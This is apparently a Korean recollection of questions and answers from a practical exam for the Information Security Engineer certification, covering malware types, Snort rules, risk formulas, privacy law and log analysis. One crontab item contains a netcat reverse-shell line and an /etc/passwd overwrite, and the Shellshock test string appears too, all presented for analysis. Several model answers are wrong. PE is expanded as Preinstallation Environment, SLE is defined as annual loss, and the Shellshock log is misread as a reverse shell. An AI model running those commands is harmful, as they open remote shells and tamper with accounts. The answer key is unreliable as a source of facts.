정보보안기사 실기 7회

1. 윈도우 PE(Preinstallation Environment) IMAGE_SECTION_HEADER에는 각 세션들의 시작주소와 크기가 있다. 괄호안에 알맞은 용어를 넣으시오.
(A)는 코드의 정보가 저장되는 영역
(B)는 전역변수, 상수의 정보가 저장되는 영역
(C) 는 DLL에서 가져와 함수 정보가 저장되는 영역

정답: .text, .data, .idata

 

2. 익스플로잇과 관련된 다음 <보기>에 알맞은 용어를 넣으시오
(A) 실제로 기계어로 구성되어 Exploit의 본체에 해당하는 프로그램의 명칭은 무엇인가?
(B) x86계열에서 NOP(No Operation) code를 hex로 표현한 어느값인가?
(C) x86계열에서 ESP에 들어있는 값을 EIP로 이동하는 어셈블리 코드를 적으시오

정답: 쉘코드, 0x90, jump esp

 

3. 윈도우 DNS 서버에서 DNS설정시 도메인 DNS서버를 등록하는 (A)와 DNS 서버에 서비스정보를 입력하는 (B)가 있다.
(A),(B) 는 각각 무엇인가.

정답: Zone 설정, 리소스 레코드 설정

 

4. Snort 정책에서 10바이트에서 12바이트 중 FFFF 바이트에 해당하는 내용을 찾으려고 할때 알맞은 빈칸을 채우시오.
alert tcp any any -> any any ( (A): “|FFFF|”; (B):9; (C):2)

정답: A: content
B: offset
C: depth

 

5. 다음에 해당하는 악성코드분류에 대해 답하시오.

키로거는 사용자가 키보드로 PC에 입력하는 내용을 몰래 낚아채어 기록하는 행위를 말한다. 하드웨어, 소프트웨어를 활용한 방법에서부터 전자적, 음향기술을 활용한 기법까지 다양한 키로깅 방법이 존재한다.

(A) : 일반적인 (Downloader)가 아닌 사용자가 인식하지 못하게 악성코드에 감염시키며, 사용자의 시스템 내부/외부에서 다양한 경로로 악성코드를 감염시킨다.

(B) : (A)의 한 종류이며 동작방식은 같으나 해당코드가 메모리 영역에 상주하여 감염시킨다.

정답: 드롭퍼,인젝터

 

6. 와이어샤크에서 DNS Response만 출력하는 필터링

 

 

 

 

 

 

정답: dns.response_to

 

7. 다음 빈칸에 알맞은 용어를 넣으시오.
(A)는 공격자가 원격에서 웹서버에 명령을 수행할 수 있도록 작성한 웹스크립트 파일을 업로드하여 웹서버에 명령을 실행해 관리자 권한을 획득후 웹페이지 소스코드 열람, 서버 내 파일유형, 백도어 프로그램 설치등을 할수 있는 공격 형태를 말한다.

정답: WebShell

 

8. 다음 괄호 안에 알맞은 용어를 넣으시오.
APT는 지능형 지속공격으로 특정 회사의 중요 정보 획득, 정치적 목적,사이버 테러 등을 목적으로 하는 해커에 의해 사이트, 기업, 개인을 상대로 지속적으로 해킹하는 공격을 의미한다. 이에 대한 대비책인 (A) 는 록히드마틴사가 정식 명칭을 특허로 등록하였다. 군사용으로 적 미사일 기지에 대한 선제공격을 의미하며, 사이버 공격에 대한 선제 대응책으로 사회적인 이슈로 대두되기도 하였다.
APT 공격의 경우 7단계의 (정찰->무기제작 배달->취약점 공격->설치->명령 및 제어 -> 표적대상행동) 공격을 진행한다. 특헝 기관을 노릴경우 대상이 무엇이든지 간에 조금씩 침투하여 공격을 감행하는 것이 특징이며, 이중 가장 취약한 절차에 대해서만 선제대응할 수 있다면 APT공격을 예방할수 있다는 것을 의미한다.

정답: 사이버 킬 체인

 

9. 다음은 통제 시점에 따른 분류이다. 알맞은 용어를 넣으시오
(A) 발생가능한 잠재적인 문제들을 식별하여 사전에 대처
(B) 예방통제를 우회하여 발생되는 문제점을 찾아내기 위한 통제
(C ) 탐지된 위협에 대처하거나 줄이는 통제

정답: 예방통제 탐지통제 교정통제

 

10. 다음괄호안에 공통적으로 들어갈 단어를 적으시오.
(A) 라 함은 정보통신서비스 제공자 등이 개인정보의 안전한 취급을 위하여 개인정보보호 조직의 구성, 개인정보취급자의 교육, 개인정보 보호조치 등을 규정한 계획을 말한다.
(A)는 개인정보처리자가 개인정보를 안전하게 관리하기 위하여 내부 의사결정 절차를 통하여 수립시행하는 내부기준을 말한다.

정답: 내부관리계획

 

11. 다음 문제에서 요구하는 사항에 답하시오
(A) 스머프 공격의 원리를 설명하고,
(B) : 방화벽이나 IDS 없이 막을수 있는 방법을 기술하라.

정답: A  공격 대상 호스트로 위조한 ICMP 패킷을 브로드캐스트하면 근처의 호스트가 다량의 Echo Reply를 발생시킨다.     

     B 라우터 외부에서 들어오는 IP directed Broadcast 패킷 차단, host는 ip broadcast로 전송된 ICMP 패킷 응답하지 않도록 설정

 

12. 다음은 위험분석에 대한 설명이다. 요구하는 각 항목에 답하시오.
1) SLE이란 무엇인가? 정답: 연간손실액
2) SLE를 구하는 식을 적으시오. 정답: AV(자산가치) * EF(자산의 손실액)
3) ALE를 구할때 SLE를 제외하고 필요한 것은 무엇인가? 정답: ARO(연간발생률)
4) 위험을 완전히 제거하는 연간비용이 X라고 할 때 ROI는? 정답: ALE-X=ROI (보안투자비용은 ALE보다 작아야한다.)

 

13. 정보통신망 이용촉진 및 정보보호 등에 관한 법률에 따라 개인 정보 유출 사실을 안 때에는 지체없이 이용자에게 알려야 한다. 이때 알려야 할 사항 5가지를 기술하시오.

정답: 유출된 개인정보 항목

       유출이 발생한 시점

       이용자가 취할 수 있는 조치

       정보통신서비스 제공자 등의 대응조치

       접수 할 수 있는 부서 및 연락처

 

14. crontab 스케줄러 내용 분석
0 0 6 * * root /bin/cp /tmp/passwd1 /etc/passwd

0 0 12 * * root /usr/bin/nc 10.10.10.10 80 -e /bin/bash

정답

임의로 조작된 passwd1 파일이 원래 passwd 파일을 덮어쓴다.
10.10.10.10 호스트에 80포트로 연결한다. 리버스쉘의 위험이 있다

 

15. HTTP Request 분석

(Source PORT: 443, Destination PORT:80)

GET /login.php HTTP/1.1

host: test.com

connection: keep-alive

Cookie: sEsz4sH5bClhslfOeJgjXdi==

Pragma: no-cache

Cache-Control: must-revalidate

Content-length: 32

.

id=admin&password=1234&act=login

정답: Cache-control에서 must-revalidate 설정으로 캐시서버를 사용하고 있지 않아 부하를 일으킬 가능성이 있다.
       전달 파라미터로 넘긴 내용에 id와 password 등의 내용은 스니핑, 도청의 민감한 정보 유출에 위협이 있다.

       쿠키 값을 노출 시키고 있다.

       443포트 접속을 80포트로 접속하고 있다.  

 

16. 다음 지문을 보고 질문에 답하시오.
OpenSSL의 보안결함을 발견하고 이를 이슈화 하기 위하여 HeatBleed 이름을 붙였다. 그 이후에 본문에 나타난 심각한 취약점을 미국 국립표준기술연구소(NIST)는 하트블리드 취약점보다 높은 최고 점수인 10점을 선정하여 발표하였고 (A) 라는 이름을 붙였다.

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
(A) 의 이름을 쓰시오. 정답: ShellShock (쉘 쇼크)
(B) A 취약점이 발생한 이유를 설명하시오. 정답: Bash 쉘이 제공하는 함수 선언기능에서 취약점이 발견
(C) 위 로그를 보고 어떠한 행위를 하고 있는지 설명하시오. 정답: 공격자의 서버에 포트를 열어놓고 피해자의 서버에서 공격자 서버로 접속하도록 유도하는 리버스 쉘 연결한다.